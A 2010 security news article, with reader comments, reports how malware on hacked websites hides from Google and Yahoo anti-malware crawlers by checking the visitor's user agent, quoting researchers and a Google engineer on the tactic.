April 23, 2010

Malicious hackers spend quite a bit of time gaming the Internet search engines in a bid to have their malware-laden sites turn up on the first page of search results for hot, trending news topics. Increasingly, though, computer criminals also are taking steps to block search engines bots from indexing legitimate Web pages that have been hacked and booby-trapped with hostile code.

Search giants Yahoo! and Google each have automated programs that crawl millions of Web sites each week in search of those hosting malicious code. When the search providers find these sites, they typically append a warning to the hacked Web site’s listing in search results, alerting the would-be visitor that the site could be dangerous. These warnings not only result in fewer people visiting infected sites, but they have a tendency to alert a listed site’s owners to a malware problem that needs attention.

This is all well and good for you and me, but not so wonderful for the bad guys. Unless, of course, said bad guys have planned ahead, by inserting code in their hacked sites that hands out malicious code to everyone except the automated anti-malware bots deployed by the top search providers.

Which is precisely what security expert David Dede found earlier this month while analyzing some Web-based malware.

“So basically the malware was checking if the user agent was from the Google or Yahoo bot and not returning the malware on that case,” wrote Dede, a security expert from Brazil who maintains the blog Sucuri Security. Meanwhile, regular visitors to the infected sites received malicious Javascript that tried to foist malware, Dede found.

Denis Sinegubko, a Russian researcher with the blog UnmaskParasites.com, recently has documented at least two examples of malware stitched into blogs that will modify the host site to hide malicious redirects from Google’s search bots.

“And the fact that I can see many such blogs in Google search results without any warnings shows that this simple trick does its job,” Sinegubko wrote.

Google’s search experts say they’re aware of and constantly counteracting these types of obfuscation techniques.

Niels Provos, principal software engineer at Google, said cyber crooks frequently try to play both sides, by attempting to block search bots from finding malware stitched into hacked sites, while simultaneously gaming the search engine bots.

“This has been going on for some time. What happens is if a Web crawler comes along, [the attackers will configure the hacked site so that it] ends up showing [trending content] they get from news sites,” Provos said. “This is to game the ranking of search content. But then if the visitor comes to one of these sites via a search engine, he ends up getting exploit code.”

Provos declined to discuss the specific steps Google takes to combat these tactics, noting that the fight with these Web site hackers is a constant arms race.

“Often these are just aimed at making it more difficult for someone from the outside investigating this kind of thing to find the bad code,” Provos said. “In any case, we have to make adjustments from time to time, but we work around them.”

6 thoughts on “Hiding from Anti-Malware Search Bots

  1. N3UJJ

    Hey a great idea, set your user agent string to match a search engine, and the site won’t expose it’s exploits.

  2. KFritz

    I’m betting that the folks @ Google probably anticipated this development. It’s completely logical and consistent development in the malware wars.

    It would be interesting to check on the duration of each individual ‘workaround’ by malware writers–how long it lasts before Google negates it. That would be a good indicator of the probability of infection for ordinary users. Of course, this would be no consolation for the unfortunate few who are infected while the malware ‘workarounds’ are functional.

    Great story!

  3. Search Engine Mart

    Traditionally speaking , it is hard to imagine our lives without search engine . Even the most recent glimmer of Google moving out of Chinese main land shows us that powerful search engines that practically regulate all the info we receive from internet can and will protect their interest without regards to the impact of their absence .

  4. kingpin

    This is where addons like WOT play a important role!
    Also Real Time Protection tool like MalwareBytes Pro is a must.It always block malicious IP before it even opens,this could be a FP in some cases but better to be safe than to be sorry later.

  5. JCitizen

    What cracks me up, is that in my honeypot searches, the search results for the attack infected sites are more accurate in what I want to find out, than the typical trusted results.

    I quite often click on these “grey” results, as I know they will result in an attack. And they do often enough!

    Maybe Google could learn a thing or two about making their results more relevant than the criminal’s??

Comments are closed.